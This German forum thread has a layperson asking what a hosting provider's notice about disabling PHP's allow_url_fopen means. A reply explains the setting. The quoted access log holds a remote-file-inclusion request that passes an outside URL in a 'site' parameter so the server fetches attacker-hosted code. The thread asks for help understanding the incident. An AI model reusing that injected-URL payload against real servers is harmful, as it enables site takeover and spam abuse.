Url_fopen

Einklappen
X
 
  • Filter
  • Zeit
  • Anzeigen
Alles löschen
neue Beiträge

  • Url_fopen

    Hallo,
    vieleicht kann man mir (einem Laien) hier helfen. Ein Freund von mir hat die u.g. Nachricht von seinem Provider erhalten. Nun rätseln wir, was URL_FOPEN bedeutet bzw. wer das unsichere Script auf den Server gelegt hat. Wir wissen jedenfalls nicht, was wir tun können...

    Mail:
    durch Massenweise Spaming über Ihren Account bzw. unsichere Scripte mit Nutzung der Funktionsweise URL_FOPEN wurde diese Funktion deaktiviert.

    Eine Aktivierung ist nur dann möglich wenn Sie uns versichern Ihre Scripte zu 100% auf Spaming gesichert zu haben, im wiederholten Falle eine Vertragskündigung mit Dauersperre die Folge ist.

    Die unberechtigte Nuzung können Sie in den Logs einsehen:
    IP-Adresse - - [21/Jan/2007:13:49:32 +0100] "POST /index2.php?site=http://www.spammer.com/poll/inboxjeje.gif? HTTP/1.1" "http://www.meinfreund.de/index2.php?site=http://www.spammer.com/poll/inboxjeje.gif?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

  • #2
    (allow_)url_fopen ist eine Einstellung in der php.ini, die steuert, ob Zugriffe auf Dateien über URLs erlaubt sind. Ist allow_url_fopen deaktiviert, so wird bspw. folgendes scheitern:
    PHP-Code:
    $fp fopen('http://www.example.com/''r'); 
    wohingegen Dateien aus dem lokalen Dateisystem natürlich davon unberührt bleiben.
    Nieder mit der Camel Case-Konvention

    Kommentar

    Lädt...
    X